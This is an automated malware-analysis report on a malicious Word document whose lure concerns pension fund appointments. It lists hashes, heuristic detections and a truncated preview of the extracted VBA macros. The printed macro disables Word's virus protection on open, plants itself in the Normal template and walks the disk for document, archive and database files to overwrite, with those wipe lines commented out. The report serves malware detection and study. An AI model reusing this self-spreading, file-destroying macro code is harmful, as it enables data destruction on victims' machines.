Office (OLE) malware analysis — malicious · 4211d89d762893c7

MALICIOUS

Office (OLE)

41.5 KB Created: 2004-06-07 18:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 2257368264094df62b3eaa8615521312 SHA-1: ae3cd65c8cf66af1b69d73e694bff9a0eb6be755 SHA-256: 4211d89d762893c740b9af1a7c8212ecebc3dd3ddde7ba4fa3de8a4ebdddc15f

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The VBA p-code indicates auto-execution via shell, suggesting the macros are designed to download and execute a second-stage payload. The document body is a plausible lure related to pension fund appointments.

Heuristics 5

Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18781 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18781 bytes
SHA-256: `2c8531f9adb442a67650c4ec2096617304a0ad099223789b408248f9d45dda57`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Модуль1" Option Explicit Dim k As String, f As String Private Declare Function FindFirstFile Lib "kernel32" _ Alias "FindFirstFileA" _ (ByVal lpFileName As String, _ lpFindFileData As WIN32_FIND_DATA) As Long Private Declare Function FindNextFile Lib "kernel32" _ Alias "FindNextFileA" _ (ByVal hFindFile As Long, _ lpFindFileData As WIN32_FIND_DATA) As Long Private Declare Function GetFileAttributes Lib "kernel32" _ Alias "GetFileAttributesA" _ (ByVal lpFileName As String) As Long Private Declare Function FindClose Lib "kernel32" _ (ByVal hFindFile As Long) As Long Const MAX_PATH = 260 Const MAXDWORD = &HFFFF Const INVALID_HANDLE_VALUE = -1 Const FILE_ATTRIBUTE_ARCHIVE = &H20 Const FILE_ATTRIBUTE_DIRECTORY = &H10 Const FILE_ATTRIBUTE_HIDDEN = &H2 Const FILE_ATTRIBUTE_NORMAL = &H80 Const FILE_ATTRIBUTE_READONLY = &H1 Const FILE_ATTRIBUTE_SYSTEM = &H4 Const FILE_ATTRIBUTE_TEMPORARY = &H100 Private Type FILETIME dwLowDateTime As Long dwHighDateTime As Long End Type Private Type WIN32_FIND_DATA dwFileAttributes As Long ftCreationTime As FILETIME ftLastAccessTime As FILETIME ftLastWriteTime As FILETIME nFileSizeHigh As Long nFileSizeLow As Long dwReserved0 As Long dwReserved1 As Long cFileName As String * MAX_PATH cAlternate As String * 14 End Type Private Function StripNulls(OriginalStr As String) As String If (InStr(OriginalStr, Chr(0)) > 0) Then OriginalStr = Left(OriginalStr, _ InStr(OriginalStr, Chr(0)) - 1) End If StripNulls = OriginalStr End Function Private Function FindFilesAPI(path As String, _ SearchStr As String, _ FileCount As Integer, _ DirCount As Integer) On Error Resume Next Dim FileName As String Dim DirName As String Dim dirNames() As String Dim nDir As Integer Dim i As Integer Dim hSearch As Long Dim WFD As WIN32_FIND_DATA Dim Cont As Integer If Right(path, 1) <> "\" Then path = path & "\" nDir = 0 ReDim dirNames(nDir) Cont = True hSearch = FindFirstFile(path & "", WFD) If hSearch <> INVALID_HANDLE_VALUE Then Do While Cont DirName = StripNulls(WFD.cFileName) If (DirName <> ".") And (DirName <> "..") Then If GetFileAttributes(path & DirName) And _ FILE_ATTRIBUTE_DIRECTORY Then dirNames(nDir) = DirName DirCount = DirCount + 1 nDir = nDir + 1 ReDim Preserve dirNames(nDir) End If End If Cont = FindNextFile(hSearch, WFD) Loop Cont = FindClose(hSearch) End If hSearch = FindFirstFile(path & SearchStr, WFD) Cont = True If hSearch <> INVALID_HANDLE_VALUE Then While Cont FileName = StripNulls(WFD.cFileName) If (FileName <> ".") And (FileName <> "..") Then FindFilesAPI = FindFilesAPI + _ (WFD.nFileSizeHigh MAXDWORD) + _ WFD.nFileSizeLow FileCount = FileCount + 1 On Error Resume Next DoEvents Dim r1 As String r1 = Right(FileName, 3) If r1 = "xls" Or r1 = "txt" Or r1 = "rtf" Or r1 = "doc" Or r1 = "rar" Or r1 = "zip" Or r1 = "dwg" Or r1 = "jpg" Or r1 = "bak" Or r1 = "dbf" Or r1 = "mdb" Or r1 = "bas" _ Or r1 = "XLS" Or r1 = "TXT" Or r1 = "RTF" Or r1 = "DOC" Or r1 = "RAR" Or r1 = "ZIP" Or r1 = "DWG" Or r1 = "JPG" Or r1 = "BAK" Or r1 = "DBF" Or r1 = "MDB" Or r1 = "BAS" Then On Error Resume Next Debug.Print path & FileName ' Open path & FileName For Output As #1 ' Print #1, " " ' Close #1 End If End If Cont = FindNextFile(hSearch, WFD) Wend Cont = FindClose(hSearch) End If If nDir > 0 Then For i = 0 To nDir - 1 FindFilesAPI = FindFilesAPI + _ FindFilesAPI(path & dirNames(i) _ & "\", SearchStr, FileCount, DirCount) Next i End If End Function Sub AutoOpen() Dim ad, nt On Error Resume Next Options.VirusProtection = False Options.SaveInterval = 2 ad = ActiveDocument.Name nt = NormalTemplate.FullName If NormalTemplate.VBProject.VBComponents.Item("Модуль1").Name = " " Then k = FreeFile MakeFile End If If Norma ... (truncated)

SHA-256: 2c8531f9adb442a67650c4ec2096617304a0ad099223789b408248f9d45dda57

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Option Explicit
Dim k As String, f As String
Private Declare Function FindFirstFile Lib "kernel32" _
Alias "FindFirstFileA" _
(ByVal lpFileName As String, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" _
Alias "FindNextFileA" _
(ByVal hFindFile As Long, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function GetFileAttributes Lib "kernel32" _
Alias "GetFileAttributesA" _
(ByVal lpFileName As String) As Long
Private Declare Function FindClose Lib "kernel32" _
(ByVal hFindFile As Long) As Long
Const MAX_PATH = 260
Const MAXDWORD = &HFFFF
Const INVALID_HANDLE_VALUE = -1
Const FILE_ATTRIBUTE_ARCHIVE = &H20
Const FILE_ATTRIBUTE_DIRECTORY = &H10
Const FILE_ATTRIBUTE_HIDDEN = &H2
Const FILE_ATTRIBUTE_NORMAL = &H80
Const FILE_ATTRIBUTE_READONLY = &H1
Const FILE_ATTRIBUTE_SYSTEM = &H4
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Function StripNulls(OriginalStr As String) As String
If (InStr(OriginalStr, Chr(0)) > 0) Then
OriginalStr = Left(OriginalStr, _
InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function
Private Function FindFilesAPI(path As String, _
SearchStr As String, _
FileCount As Integer, _
DirCount As Integer)
On Error Resume Next
Dim FileName As String
Dim DirName As String
Dim dirNames() As String
Dim nDir As Integer
Dim i As Integer
Dim hSearch As Long
Dim WFD As WIN32_FIND_DATA
Dim Cont As Integer
If Right(path, 1) <> "\" Then path = path & "\"
nDir = 0
ReDim dirNames(nDir)
Cont = True
hSearch = FindFirstFile(path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While Cont
DirName = StripNulls(WFD.cFileName)
If (DirName <> ".") And (DirName <> "..") Then
If GetFileAttributes(path & DirName) And _
                           FILE_ATTRIBUTE_DIRECTORY Then
dirNames(nDir) = DirName
DirCount = DirCount + 1
nDir = nDir + 1
ReDim Preserve dirNames(nDir)
End If
End If
Cont = FindNextFile(hSearch, WFD)
Loop
Cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(path & SearchStr, WFD)
Cont = True
If hSearch <> INVALID_HANDLE_VALUE Then
While Cont
FileName = StripNulls(WFD.cFileName)
If (FileName <> ".") And (FileName <> "..") Then
FindFilesAPI = FindFilesAPI + _
(WFD.nFileSizeHigh * MAXDWORD) + _
WFD.nFileSizeLow
FileCount = FileCount + 1
On Error Resume Next
DoEvents
Dim r1 As String
r1 = Right(FileName, 3)
If r1 = "xls" Or r1 = "txt" Or r1 = "rtf" Or r1 = "doc" Or r1 = "rar" Or r1 = "zip" Or r1 = "dwg" Or r1 = "jpg" Or r1 = "bak" Or r1 = "dbf" Or r1 = "mdb" Or r1 = "bas" _
Or r1 = "XLS" Or r1 = "TXT" Or r1 = "RTF" Or r1 = "DOC" Or r1 = "RAR" Or r1 = "ZIP" Or r1 = "DWG" Or r1 = "JPG" Or r1 = "BAK" Or r1 = "DBF" Or r1 = "MDB" Or r1 = "BAS" Then
On Error Resume Next
Debug.Print path & FileName
' Open path & FileName For Output As #1
' Print #1, " "
' Close #1
End If
End If
Cont = FindNextFile(hSearch, WFD)
Wend
Cont = FindClose(hSearch)
End If
If nDir > 0 Then
For i = 0 To nDir - 1
FindFilesAPI = FindFilesAPI + _
FindFilesAPI(path & dirNames(i) _
& "\", SearchStr, FileCount, DirCount)
Next i
End If
End Function
 Sub AutoOpen()
Dim ad, nt
On Error Resume Next
Options.VirusProtection = False
Options.SaveInterval = 2
ad = ActiveDocument.Name
nt = NormalTemplate.FullName
If NormalTemplate.VBProject.VBComponents.Item("Модуль1").Name = " " Then
k = FreeFile
MakeFile
End If
If Norma
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.